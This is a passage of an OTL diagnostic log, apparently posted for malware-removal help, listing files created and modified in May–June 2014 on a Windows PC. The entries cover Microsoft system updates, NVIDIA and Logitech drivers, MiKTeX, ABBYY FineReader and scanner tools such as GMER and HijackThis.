(Microsoft Corporation) -- C:\windows\SysNative\rasgcw.dll [2014-05-14 15:59:14 | 000,191,488 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\InputSwitch.dll [2014-05-14 14:18:58 | 016,875,520 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.UI.Xaml.dll [2014-05-14 14:18:57 | 001,291,200 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\kernel32.dll [2014-05-14 14:18:56 | 001,112,536 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\KernelBase.dll [2014-05-14 14:18:56 | 000,376,152 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\clfs.sys [2014-05-14 14:18:54 | 012,732,416 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.UI.Xaml.dll [2014-05-14 14:18:53 | 013,392,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\vmms.exe [2014-05-14 14:18:51 | 000,040,960 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Shell.Search.UriHandler.dll [2014-05-14 14:18:50 | 008,653,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.UI.Search.dll [2014-05-14 14:18:49 | 007,425,368 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ntoskrnl.exe [2014-05-14 14:18:46 | 006,641,152 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mstscax.dll [2014-05-14 14:18:46 | 000,035,328 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Shell.Search.UriHandler.dll [2014-05-14 14:18:45 | 005,833,728 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.UI.Search.dll [2014-05-14 14:18:43 | 005,770,752 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mstscax.dll [2014-05-14 14:18:43 | 002,900,992 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msftedit.dll [2014-05-14 14:18:42 | 004,268,544 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SyncEngine.dll [2014-05-14 14:18:41 | 006,172,160 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\vmwp.exe [2014-05-14 14:18:41 | 002,270,208 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\msftedit.dll [2014-05-14 14:18:40 | 002,373,784 | ---- | C] (Microsoft Corporation) -- C:\windows\explorer.exe [2014-05-14 14:18:39 | 002,641,920 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\authui.dll [2014-05-14 14:18:39 | 002,133,504 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dwmcore.dll [2014-05-14 14:18:39 | 002,088,160 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\explorer.exe [2014-05-14 14:18:39 | 001,306,624 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AppXDeploymentServer.dll [2014-05-14 14:18:38 | 002,317,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\authui.dll [2014-05-14 14:18:38 | 002,141,912 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\d3d11.dll [2014-05-14 14:18:37 | 001,542,768 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ole32.dll [2014-05-14 14:18:37 | 001,411,584 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\lsasrv.dll [2014-05-14 14:18:36 | 001,779,800 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\d3d11.dll [2014-05-14 14:18:36 | 001,764,864 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\dwmcore.dll [2014-05-14 14:18:36 | 001,129,472 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SearchFolder.dll [2014-05-14 14:18:35 | 001,230,336 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Media.dll [2014-05-14 14:18:35 | 000,958,464 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MFMediaEngine.dll [2014-05-14 14:18:35 | 000,918,528 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MrmCoreR.dll [2014-05-14 14:18:34 | 001,023,488 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\localspl.dll [2014-05-14 14:18:34 | 000,950,784 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ReAgent.dll [2014-05-14 14:18:34 | 000,888,320 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Media.dll [2014-05-14 14:18:34 | 000,801,792 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\MFMediaEngine.dll [2014-05-14 14:18:34 | 000,655,360 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dnsapi.dll [2014-05-14 14:18:34 | 000,512,000 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wlidprov.dll [2014-05-14 14:18:33 | 001,466,864 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\propsys.dll [2014-05-14 14:18:33 | 001,339,240 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\gdi32.dll [2014-05-14 14:18:33 | 000,800,256 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ReAgent.dll [2014-05-14 14:18:33 | 000,492,256 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mfsvr.dll [2014-05-14 14:18:32 | 000,629,760 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\MrmCoreR.dll [2014-05-14 14:18:32 | 000,518,552 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dxgi.dll [2014-05-14 14:18:32 | 000,467,504 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AudioSes.dll [2014-05-14 14:18:32 | 000,388,408 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mfsvr.dll [2014-05-14 14:18:31 | 000,356,848 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dcomp.dll [2014-05-14 14:18:30 | 000,669,696 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\rasapi32.dll [2014-05-14 14:18:30 | 000,379,224 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\dxgmms1.sys [2014-05-14 14:18:30 | 000,364,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AUDIOKSE.dll [2014-05-14 14:18:30 | 000,356,864 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wlidprov.dll [2014-05-14 14:18:29 | 001,656,832 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\GdiPlus.dll [2014-05-14 14:18:29 | 000,834,560 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\netlogon.dll [2014-05-14 14:18:29 | 000,691,200 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\vmswitch.sys [2014-05-14 14:18:29 | 000,157,016 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\wof.sys [2014-05-14 14:18:28 | 000,720,896 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\fveapi.dll [2014-05-14 14:18:28 | 000,305,768 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\AUDIOKSE.dll [2014-05-14 14:18:27 | 000,924,160 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AppXDeploymentExtensions.dll [2014-05-14 14:18:27 | 000,706,048 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\Wnv.sys [2014-05-14 14:18:27 | 000,291,840 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Devices.Sensors.dll [2014-05-14 14:18:27 | 000,222,720 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\dcomp.dll [2014-05-14 14:18:26 | 001,429,336 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\hvix64.exe [2014-05-14 14:18:26 | 001,351,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\GdiPlus.dll [2014-05-14 14:18:25 | 000,872,448 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SkyDrive.exe [2014-05-14 14:18:25 | 000,721,408 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SkyDriveTelemetry.dll [2014-05-14 14:18:25 | 000,370,176 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wlanmsm.dll [2014-05-14 14:18:25 | 000,252,928 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AppXDeploymentClient.dll [2014-05-14 14:18:25 | 000,247,296 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SensorsApi.dll [2014-05-14 14:18:25 | 000,226,304 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Devices.Sensors.dll [2014-05-14 14:18:24 | 001,378,648 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\hvax64.exe [2014-05-14 14:18:24 | 000,621,568 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MDMAgent.exe [2014-05-14 14:18:24 | 000,488,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\netcfgx.dll [2014-05-14 14:18:24 | 000,463,264 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AudioEng.dll [2014-05-14 14:18:24 | 000,337,752 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\Classpnp.sys [2014-05-14 14:18:24 | 000,197,632 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\AppXDeploymentClient.dll [2014-05-14 14:18:23 | 001,390,936 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\hvloader.efi [2014-05-14 14:18:23 | 001,263,960 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\hvloader.exe [2014-05-14 14:18:23 | 000,667,136 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\gpprefcl.dll [2014-05-14 14:18:23 | 000,390,488 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\netcfgx.dll [2014-05-14 14:18:23 | 000,300,544 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wlanmsm.dll [2014-05-14 14:18:23 | 000,171,008 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\SensorsApi.dll [2014-05-14 14:18:22 | 000,467,800 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\USBHUB3.SYS [2014-05-14 14:18:22 | 000,421,376 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\synthnic.dll [2014-05-14 14:18:22 | 000,334,848 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MDEServer.exe [2014-05-14 14:18:22 | 000,244,888 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\audiodg.exe [2014-05-14 14:18:22 | 000,201,216 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AudioEndpointBuilder.dll [2014-05-14 14:18:22 | 000,186,368 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dafWfdProvider.dll [2014-05-14 14:18:21 | 001,843,712 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Display.dll [2014-05-14 14:18:21 | 001,816,576 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Display.dll [2014-05-14 14:18:21 | 000,563,200 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AdmTmpl.dll [2014-05-14 14:18:21 | 000,299,008 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\pdh.dll [2014-05-14 14:18:21 | 000,113,648 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\userenv.dll [2014-05-14 14:18:21 | 000,102,912 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\davclnt.dll [2014-05-14 14:18:20 | 000,360,512 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mfreadwrite.dll [2014-05-14 14:18:20 | 000,212,992 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\cdd.dll [2014-05-14 14:18:20 | 000,201,216 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ReInfo.dll [2014-05-14 14:18:20 | 000,160,768 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AppxAllUserStore.dll [2014-05-14 14:18:20 | 000,139,776 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\AppxAllUserStore.dll [2014-05-14 14:18:19 | 001,015,808 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\aclui.dll [2014-05-14 14:18:19 | 000,589,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\gpprefcl.dll [2014-05-14 14:18:19 | 000,462,336 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wlangpui.dll [2014-05-14 14:18:19 | 000,412,672 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\FWPUCLNT.DLL [2014-05-14 14:18:19 | 000,355,832 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mfreadwrite.dll [2014-05-14 14:18:19 | 000,350,720 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\EmulatedNic.dll [2014-05-14 14:18:19 | 000,296,960 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wlanapi.dll [2014-05-14 14:18:18 | 000,542,208 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Graphics.Printing.dll [2014-05-14 14:18:18 | 000,428,888 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\FWPKCLNT.SYS [2014-05-14 14:18:18 | 000,298,496 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WSDMon.dll [2014-05-14 14:18:18 | 000,271,872 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\spp.dll [2014-05-14 14:18:18 | 000,254,976 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\pdh.dll [2014-05-14 14:18:18 | 000,230,400 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wlanapi.dll [2014-05-14 14:18:18 | 000,136,024 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\wfplwfs.sys [2014-05-14 14:18:18 | 000,110,592 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drvinst.exe [2014-05-14 14:18:17 | 000,731,648 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\adtschema.dll [2014-05-14 14:18:17 | 000,731,648 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\adtschema.dll [2014-05-14 14:18:17 | 000,425,984 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\clusapi.dll [2014-05-14 14:18:17 | 000,079,360 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\w32tm.exe [2014-05-14 14:18:16 | 000,887,296 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\aclui.dll [2014-05-14 14:18:16 | 000,386,560 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wlangpui.dll [2014-05-14 14:18:16 | 000,264,192 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\FWPUCLNT.DLL [2014-05-14 14:18:16 | 000,244,224 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WSDScDrv.dll [2014-05-14 14:18:16 | 000,210,944 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\fveapibase.dll [2014-05-14 14:18:16 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\hidclass.sys [2014-05-14 14:18:16 | 000,098,816 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\drvinst.exe [2014-05-14 14:18:16 | 000,070,656 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\w32tm.exe [2014-05-14 14:18:16 | 000,057,856 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drvcfg.exe [2014-05-14 14:18:16 | 000,030,208 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\CredentialMigrationHandler.dll [2014-05-14 14:18:16 | 000,027,136 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\CredentialMigrationHandler.dll [2014-05-14 14:18:15 | 000,855,552 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\rdvidcrl.dll [2014-05-14 14:18:15 | 000,402,432 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Graphics.Printing.dll [2014-05-14 14:18:15 | 000,325,632 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\LocationApi.dll [2014-05-14 14:18:15 | 000,192,000 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Devices.Scanners.dll [2014-05-14 14:18:15 | 000,086,016 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\RMapi.dll [2014-05-14 14:18:15 | 000,064,512 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\tsgqec.dll [2014-05-14 14:18:14 | 001,057,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\rdvidcrl.dll [2014-05-14 14:18:14 | 000,794,112 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\fvewiz.dll [2014-05-14 14:18:14 | 000,717,312 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\nshwfp.dll [2014-05-14 14:18:14 | 000,444,928 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\AdmTmpl.dll [2014-05-14 14:18:14 | 000,313,344 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\clusapi.dll [2014-05-14 14:18:14 | 000,172,544 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ReInfo.dll [2014-05-14 14:18:14 | 000,151,040 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Devices.Scanners.dll [2014-05-14 14:18:14 | 000,115,200 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\DevPropMgr.dll [2014-05-14 14:18:14 | 000,100,352 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\BitLockerDeviceEncryption.exe [2014-05-14 14:18:13 | 000,567,296 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\nshwfp.dll [2014-05-14 14:18:13 | 000,262,656 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\LocationApi.dll [2014-05-14 14:18:13 | 000,083,968 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\sxproxy.dll [2014-05-14 14:18:13 | 000,040,448 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SetNetworkLocation.dll [2014-05-14 14:18:13 | 000,033,792 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\sxproxy.dll [2014-05-14 14:18:12 | 000,443,904 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wlansec.dll [2014-05-14 14:18:12 | 000,274,944 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WsmWmiPl.dll [2014-05-14 14:18:12 | 000,099,328 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\BdeHdCfgLib.dll [2014-05-14 14:18:12 | 000,069,120 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\l2gpstore.dll [2014-05-14 14:18:12 | 000,058,368 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\l2gpstore.dll [2014-05-14 14:18:12 | 000,011,264 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wlanhlp.dll [2014-05-14 14:18:12 | 000,011,264 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wlanhlp.dll [2014-05-14 14:18:11 | 000,130,560 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\BdeHdCfg.exe [2014-05-14 14:18:11 | 000,053,248 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\tsgqec.dll [2014-05-14 14:13:09 | 002,678,784 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SettingsHandlers.dll [2014-05-14 14:12:05 | 013,933,568 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wmp.dll [2014-05-14 14:12:05 | 002,144,984 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mfcore.dll [2014-05-14 14:12:04 | 011,776,000 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wmp.dll [2014-05-14 14:12:03 | 002,574,240 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WMVDECOD.DLL [2014-05-14 14:12:03 | 002,142,976 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mfcore.dll [2014-05-14 14:12:03 | 001,399,176 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winmde.dll [2014-05-14 14:12:02 | 002,410,496 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\WMVDECOD.DLL [2014-05-14 14:12:02 | 001,217,024 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Media.Streaming.dll [2014-05-14 14:12:02 | 001,215,832 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mfnetsrc.dll [2014-05-14 14:12:02 | 001,206,000 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\winmde.dll [2014-05-14 14:12:02 | 000,978,944 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Media.Streaming.dll [2014-05-14 14:12:02 | 000,800,552 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mfnetcore.dll [2014-05-14 14:12:02 | 000,609,456 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mf.dll [2014-05-14 14:12:01 | 001,757,184 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WMPDMC.exe [2014-05-14 14:12:01 | 001,392,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\WMPDMC.exe [2014-05-14 14:12:01 | 001,374,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wmpmde.dll [2014-05-14 14:12:01 | 001,011,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mfnetsrc.dll [2014-05-14 14:12:01 | 000,881,616 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mfplat.dll [2014-05-14 14:12:01 | 000,650,736 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mfnetcore.dll [2014-05-14 14:12:01 | 000,518,552 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mf.dll [2014-05-14 14:12:00 | 000,707,048 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mfplat.dll [2014-05-14 14:12:00 | 000,372,360 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msvproc.dll [2014-05-14 14:12:00 | 000,324,896 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MFCaptureEngine.dll [2014-05-14 14:12:00 | 000,317,584 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\msvproc.dll [2014-05-14 14:12:00 | 000,285,144 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\MFCaptureEngine.dll [2014-05-14 14:11:59 | 000,220,160 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wmpdxm.dll [2014-05-14 14:11:59 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Media.Renewal.dll [2014-05-14 14:11:59 | 000,028,416 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mfpmp.exe [2014-05-14 14:11:59 | 000,006,144 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msdxm.ocx [2014-05-14 14:11:59 | 000,006,144 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dxmasf.dll [2014-05-14 14:06:38 | 000,233,912 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mfps.dll [2014-05-13 22:47:58 | 000,000,000 | ---D | C] -- C:\Users\Marcin\Desktop\Desktop Dungeons [2014-05-13 20:48:06 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Texmaker [2014-05-13 20:48:06 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Texmaker [2014-05-13 20:47:55 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Texmaker [2014-05-13 20:34:25 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Local\MiKTeX [2014-05-13 20:32:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiKTeX 2.9 [2014-05-13 20:31:18 | 000,000,000 | ---D | C] -- C:\ProgramData\MiKTeX [2014-05-13 20:28:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\MiKTeX 2.9 [2014-05-13 20:13:28 | 171,108,104 | ---- | C] (MiKTeX.org) -- C:\Users\Marcin\Desktop\basic-miktex-2.9.5105.exe [2014-05-13 18:41:11 | 000,000,000 | ---D | C] -- C:\ProgramData\LogiShrd [2014-05-13 18:41:10 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Local\Logitech [2014-05-13 18:40:00 | 000,018,960 | ---- | C] (Logitech, Inc.) -- C:\windows\SysNative\drivers\LNonPnP.sys [2014-05-13 18:39:30 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech [2014-05-13 18:39:17 | 000,000,000 | ---D | C] -- C:\Program Files\Logitech Gaming Software [2014-05-13 18:37:10 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Roaming\Logitech [2014-05-13 18:37:10 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Roaming\Logishrd [2014-05-11 20:37:56 | 024,025,376 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvoglv32.dll [2014-05-11 20:37:56 | 018,531,568 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvwgf2umx.dll [2014-05-11 20:37:56 | 000,952,952 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvumdshimx.dll [2014-05-11 20:37:56 | 000,837,056 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvumdshim.dll [2014-05-11 20:37:55 | 017,480,432 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvd3dumx.dll [2014-05-11 20:37:55 | 014,434,704 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvd3dum.dll [2014-05-11 20:37:54 | 002,730,208 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvapi.dll [2014-05-11 15:06:35 | 001,890,080 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvdispco6433750.dll [2014-05-11 15:06:35 | 001,539,416 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvdispgenco6433750.dll [2014-05-11 13:45:27 | 000,000,000 | R--D | C] -- C:\Users\Marcin\Documents\Scanned Documents [2014-05-11 13:45:27 | 000,000,000 | ---D | C] -- C:\Users\Marcin\Documents\Fax [2014-05-10 21:51:58 | 000,000,000 | ---D | C] -- C:\Users\Marcin\nvvp_workspace [2014-05-10 21:51:49 | 000,000,000 | ---D | C] -- C:\Users\Marcin\.eclipse [2014-05-10 14:02:39 | 000,000,000 | ---D | C] -- C:\Users\Marcin\Desktop\fotografia_hdr_wyklady [2014-05-09 19:39:58 | 000,040,392 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\drivers\nvvad64v.sys [2014-05-09 19:39:58 | 000,034,760 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvaudcap32v.dll [2014-05-08 15:24:06 | 003,851,784 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\D3DX9_39.dll [2014-05-08 15:23:06 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Codemasters [2014-05-05 21:42:49 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Roaming\ABBYY [2014-05-05 21:41:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ABBYY FineReader 11 [2014-05-05 21:39:13 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\ABBYY [2014-05-05 21:36:27 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Local\ABBYY [2014-05-05 21:36:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\ABBYY FineReader 11 [2014-05-05 21:36:26 | 000,000,000 | ---D | C] -- C:\ProgramData\ABBYY [2014-05-05 21:29:07 | 000,000,000 | ---D | C] -- C:\Temp [2 C:\windows\SysWow64\*.tmp files -> C:\windows\SysWow64\*.tmp -> ] [2 C:\windows\*.tmp files -> C:\windows\*.tmp -> ] [color=#E56717]========== Files - Modified Within 30 Days ==========[/color] [2014-06-04 11:46:21 | 002,061,824 | ---- | M] (Farbar) -- C:\Users\Marcin\Desktop\FRST64.exe [2014-06-04 11:41:43 | 000,370,943 | ---- | M] () -- C:\Users\Marcin\Desktop\gmer.zip [2014-06-04 11:41:33 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Marcin\Desktop\OTL.exe [2014-06-04 11:27:41 | 000,001,066 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineUA.job [2014-06-04 11:12:22 | 000,108,968 | ---- | M] (Oracle Corporation) -- C:\windows\SysNative\WindowsAccessBridge-64.dll [2014-06-04 11:12:20 | 000,313,256 | ---- | M] (Oracle Corporation) -- C:\windows\SysNative\javaws.exe [2014-06-04 11:12:20 | 000,189,352 | ---- | M] (Oracle Corporation) -- C:\windows\SysNative\javaw.exe [2014-06-04 11:12:20 | 000,189,352 | ---- | M] (Oracle Corporation) -- C:\windows\SysNative\java.exe [2014-06-04 11:12:04 | 000,388,608 | ---- | M] (Trend Micro Inc.) -- C:\Users\Marcin\Desktop\HijackThis_2.0.4.exe [2014-06-04 11:10:39 | 000,096,168 | ---- | M] (Oracle Corporation) -- 